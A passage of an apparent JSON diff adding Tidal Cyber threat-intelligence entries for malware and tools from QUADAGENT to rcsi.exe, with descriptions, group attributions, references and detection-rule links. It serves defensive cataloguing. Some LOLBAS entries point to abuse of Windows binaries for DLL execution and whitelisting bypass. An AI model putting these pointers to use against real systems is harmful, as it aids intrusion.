"[QUADAGENT](https://app.tidalcyber.com/software/2bf68242-1dbd-405b-ac35-330eda887081) is a PowerShell backdoor used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). [[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0269", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", + "type": "similar" + } + ], + "uuid": "2bf68242-1dbd-405b-ac35-330eda887081", + "value": "QUADAGENT" + }, + { + "description": "[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)][[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "293643d5-aeb3-4b1a-8cb4-79c0c0d19f7d" + }, + "related": [ + { + "dest-uuid": "4bab7c2b-5ec4-467e-8df4-f2e6996e136b", + "type": "similar" + } + ], + "uuid": "cc118a28-e714-416e-bf2d-e82525f4782d", + "value": "xRAT" + }, + { + "description": "[QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is developed in the C# language.[[GitHub QuasarRAT](https://app.tidalcyber.com/references/c87e4427-af97-4e93-9596-ad5a588aa171)][[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0262", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "type": "used-by" + }, + { + "dest-uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "type": "used-by" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", + "type": "similar" + }, + { + "dest-uuid": "cc118a28-e714-416e-bf2d-e82525f4782d", + "type": "similar" + } + ], + "uuid": "4bab7c2b-5ec4-467e-8df4-f2e6996e136b", + "value": "QuasarRAT" + }, + { + "description": "[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", + "meta": { + "id": "bcc438cd-d1be-59be-b12e-b83d4dfd571e" + }, + "related": [ + { + "dest-uuid": "52d3515c-5184-5257-bf24-56adccb4cccd", + "type": "similar" + } + ], + "uuid": "9f3ab541-3447-4e2e-9f35-f7f1f7328385", + "value": "Tunnus" + }, + { + "description": "[QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1076", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "93289ecf-4d15-4d6b-a9c3-4ab27e145ef4", + "type": "similar" + }, + { + "dest-uuid": "9f3ab541-3447-4e2e-9f35-f7f1f7328385", + "type": "similar" + } + ], + "uuid": "52d3515c-5184-5257-bf24-56adccb4cccd", + "value": "QUIETCANARY" + }, + { + "description": "[QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) has deployed [QUIETEXIT](https://app.tidalcyber.com/software/947ab087-7550-577f-9ae9-5e82e9910610) on opaque network appliances that typically don't support antivirus or endpoint detection and response tools within a victim environment.[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]", + "meta": { + "platforms": [ + "Network" + ], + "software_attack_id": "S1084", + "source": "MITRE", + "tags": [ + "33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "4816d361-f82b-4a18-aa05-b215e7cf9200", + "type": "similar" + } + ], + "uuid": "947ab087-7550-577f-9ae9-5e82e9910610", + "value": "QUIETEXIT" + }, + { + "description": "[QuietSieve](https://app.tidalcyber.com/software/dcdb74c5-4445-49bd-9f9c-236a7ecc7904) is an information stealer that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0686", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "03eb4a05-6a02-43f6-afb7-3c7835501828", + "type": "similar" + } + ], + "uuid": "dcdb74c5-4445-49bd-9f9c-236a7ecc7904", + "value": "QuietSieve" + }, + { + "description": "", + "meta": { + "id": "8d4eeb76-9f88-4994-adc2-244ed77b0606", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7b78eb31-f251-493b-8058-14a3452e8ccc", + "type": "similar" + } + ], + "uuid": "b75127d4-1d6e-49fe-9919-fe5e471be7c2", + "value": "Quser.exe" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is \"a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5053", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "b75127d4-1d6e-49fe-9919-fe5e471be7c2", + "type": "similar" + } + ], + "uuid": "7b78eb31-f251-493b-8058-14a3452e8ccc", + "value": "Quser" + }, + { + "description": "Raccoon Stealer is one of the most heavily used information & credential stealers (\"\"infostealers\"\") in recent years. The \"\"2.0\"\" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.[[Sekoia.io Raccoon Stealer June 28 2022](/references/df0c9cbd-8692-497e-9f81-cf9e44a3a5cd)] Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for weeklong access) contributes to the malware's popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.\n\nMore details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5070", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "7046193b-96c2-462b-9ba1-ea39a938e8e9", + "value": "Raccoon Stealer 2.0" + }, + { + "description": "[Ragnar Locker](https://app.tidalcyber.com/software/d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f) is a ransomware that has been in use since at least December 2019.[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)][[Cynet Ragnar Apr 2020](https://app.tidalcyber.com/references/aeb637ea-0b83-42a0-8f68-9fdc59aa462a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0481", + "source": "MITRE", + "tags": [ + "cb5803f0-8ab4-4ada-8540-7758dfc126e2", + "5e7433ad-a894-4489-93bc-41e90da90019", + "a2e000da-8181-4327-bacd-32013dbd3654", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "54895630-efd2-4608-9c24-319de972a9eb", + "type": "similar" + } + ], + "uuid": "d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f", + "value": "Ragnar Locker" + }, + { + "description": "[Raindrop](https://app.tidalcyber.com/software/80295aeb-59e3-4c5d-ac39-9879158f8d23) is a loader used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was discovered in January 2021 and was likely used since at least May 2020.[[Symantec RAINDROP January 2021](https://app.tidalcyber.com/references/9185092d-3d99-466d-b885-f4e76fe74b6b)][[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0565", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "4efc3e00-72f2-466a-ab7c-8a7dc6603b19", + "type": "similar" + } + ], + "uuid": "80295aeb-59e3-4c5d-ac39-9879158f8d23", + "value": "Raindrop" + }, + { + "description": "[RainyDay](https://app.tidalcyber.com/software/42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e) is a backdoor tool that has been used by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) since at least 2020.[[Bitdefender Naikon April 2021](https://app.tidalcyber.com/references/55660913-4c03-4360-bb8b-1cad94bd8d0e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0629", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "29231689-5837-4a7a-aafc-1b65b3f50cc7", + "type": "similar" + } + ], + "uuid": "42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e", + "value": "RainyDay" + }, + { + "description": "[Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) and the [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8)-associated Retro malware.[[Eset Ramsay May 2020](https://app.tidalcyber.com/references/3c149b0b-f37c-4d4e-aa61-351c87fd57ce)][[Antiy CERT Ramsay April 2020](https://app.tidalcyber.com/references/280636da-fa21-472c-947c-651a628ea2cd)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0458", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "ba09b86c-1c40-4ff1-bda0-0d8c4ca35997", + "type": "similar" + } + ], + "uuid": "dc307b3c-9bc5-4624-b0bc-4807fa1fc57b", + "value": "Ramsay" + }, + { + "description": "[RARSTONE](https://app.tidalcyber.com/software/a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2) is malware used by the [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) group that has some characteristics similar to [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10). [[Aquino RARSTONE](https://app.tidalcyber.com/references/2327592e-4e8a-481e-bdf9-d548c776adee)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0055", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "8c553311-0baa-4146-997a-f79acef3d831", + "type": "similar" + } + ], + "uuid": "a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2", + "value": "RARSTONE" + }, + { + "description": "[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]", + "meta": { + "id": "4633eaeb-d4db-43ae-bb44-d339ca0d0085", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8d34715e-1018-40fc-bf09-4eca69be830e", + "type": "similar" + } + ], + "uuid": "4a94b274-9bc0-4c51-82d7-e82f6e107b9c", + "value": "Rasautou.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Remote Access Dialer\n\n**Author:** Tony Lambert\n\n**Paths:**\n* C:\\Windows\\System32\\rasautou.exe\n\n**Resources:**\n* [https://github.com/fireeye/DueDLLigence](https://github.com/fireeye/DueDLLigence)\n* [https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html](https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html)\n\n**Detection:**\n* Sigma: [win_rasautou_dll_execution.yml](https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml)\n* IOC: rasautou.exe command line containing -d and -p[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5146", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4a94b274-9bc0-4c51-82d7-e82f6e107b9c", + "type": "similar" + } + ], + "uuid": "8d34715e-1018-40fc-bf09-4eca69be830e", + "value": "Rasautou" + }, + { + "description": "A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]\n\n**Delivers**: Cobalt Strike[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)], SocGholish[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)], Truebot[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)][[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/raspberryrobin/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/Raspberry%20Robin", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5002", + "source": "Tidal Cyber", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [], + "uuid": "dc0dbd15-0916-43c7-a3b9-6dc3ce0771be", + "value": "Raspberry Robin" + }, + { + "description": "[RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) is a remote controller tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. [[Lazarus RATANKBA](https://app.tidalcyber.com/references/e3f9853f-29b0-4219-a488-a6ecfa16b09f)] [[RATANKBA](https://app.tidalcyber.com/references/7d08ec64-7fb8-4520-b26b-95b0dee891fe)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0241", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "9b325b06-35a1-457d-be46-a4ecc0b7ff0c", + "type": "similar" + } + ], + "uuid": "40466d7d-a107-46aa-a6fc-180e0eef2c6b", + "value": "RATANKBA" + }, + { + "description": "[RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.[[EldoS RawDisk ITpro](https://app.tidalcyber.com/references/a6cf3d1d-2310-42bb-9324-495b4e94d329)][[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0364", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "type": "similar" + } + ], + "uuid": "d86a562d-d235-4481-9a3f-273fa3ebe89a", + "value": "RawDisk" + }, + { + "description": "The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[Github Mempdump](https://app.tidalcyber.com/references/f830ed8b-33fa-4d1e-a66c-41f8c6aba69c)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", + "meta": { + "id": "ea5a6334-00e8-4eeb-93c5-82cab199ae2e" + }, + "related": [ + { + "dest-uuid": "6ea1bf95-fed8-4b94-8071-aa19a3af5e34", + "type": "similar" + } + ], + "uuid": "d6d49a18-4cf9-4ba3-906c-0091494c42e4", + "value": "FIENDCRY" + }, + { + "description": "The DUEBREW component is a Perl2Exe binary launcher. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", + "meta": { + "id": "419644f0-860d-4de4-8d44-91be643eff77" + }, + "related": [ + { + "dest-uuid": "6ea1bf95-fed8-4b94-8071-aa19a3af5e34", + "type": "similar" + } + ], + "uuid": "2f190c9a-f999-4e44-8083-619225ef7890", + "value": "DUEBREW" + }, + { + "description": "The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", + "meta": { + "id": "9d1c1d90-38d5-4da7-9f74-ebe24170d01c" + }, + "related": [ + { + "dest-uuid": "6ea1bf95-fed8-4b94-8071-aa19a3af5e34", + "type": "similar" + } + ], + "uuid": "61841581-51bc-4559-b87f-e3fbadf40eb7", + "value": "DRIFTWOOD" + }, + { + "description": "[RawPOS](https://app.tidalcyber.com/software/6ea1bf95-fed8-4b94-8071-aa19a3af5e34) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [[Kroll RawPOS Jan 2017](https://app.tidalcyber.com/references/cbbfffb9-c378-4e57-a2af-e76e6014ed57)] [[TrendMicro RawPOS April 2015](https://app.tidalcyber.com/references/e483ed86-713b-42c6-ad77-e9b889bbcb81)] [[Visa RawPOS March 2015](https://app.tidalcyber.com/references/a2371f44-0a88-4d68-bbe7-7e79f13f78c2)] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0169", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", + "type": "similar" + }, + { + "dest-uuid": "d6d49a18-4cf9-4ba3-906c-0091494c42e4", + "type": "similar" + }, + { + "dest-uuid": "2f190c9a-f999-4e44-8083-619225ef7890", + "type": "similar" + }, + { + "dest-uuid": "61841581-51bc-4559-b87f-e3fbadf40eb7", + "type": "similar" + } + ], + "uuid": "6ea1bf95-fed8-4b94-8071-aa19a3af5e34", + "value": "RawPOS" + }, + { + "description": "[Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and DarkSide Ransomware-as-a-Service operations.[[Rclone](https://app.tidalcyber.com/references/3c7824de-d958-4254-beec-bc4e5ab989b0)][[Rclone Wars](https://app.tidalcyber.com/references/d47e5f7c-cf70-4f7c-ac83-57e4e1187485)][[Detecting Rclone](https://app.tidalcyber.com/references/2e44290c-32f5-4e7f-96de-9874df79fe89)][[DarkSide Ransomware Gang](https://app.tidalcyber.com/references/5f8d49e8-22da-425f-b63b-a799b97ec2b5)][[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S1040", + "source": "MITRE", + "tags": [ + "a40b7316-bef6-4186-9764-58ce6f033850", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "8bf128ad-288b-41bc-904f-093f4fdde745", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "07bdadce-905e-4337-898a-13e88cfb5a61", + "type": "used-by" + }, + { + "dest-uuid": "59096109-a1dd-463b-87e7-a8d110fe3a79", + "type": "similar" + } + ], + "uuid": "1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4", + "value": "Rclone" + }, + { + "description": "[RCSession](https://app.tidalcyber.com/software/38c4d208-fe38-4965-871c-709fa1479ba3) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) and by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) (Type II Backdoor).[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)][[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0662", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "03acae53-9b98-46f6-b204-16b930839055", + "type": "similar" + } + ], + "uuid": "38c4d208-fe38-4965-871c-709fa1479ba3", + "value": "RCSession" + }, + { + "description": "[[rcsi.exe - LOLBAS Project](/references/dc02058a-7ed3-4253-a976-6f99b9e91406)]", + "meta": { + "id": "810f4a0a-ef9d-4771-8c97-9803508cdba3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9a5cff11-6bad-407a-a53c-2562a56ac024", + "type": "similar" + } + ], + "uuid": "c0f4b154-5dac-40e7-b6d0-eb111c1da58c", + "value": "rcsi.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Non-Interactive command line inerface included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/](https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: 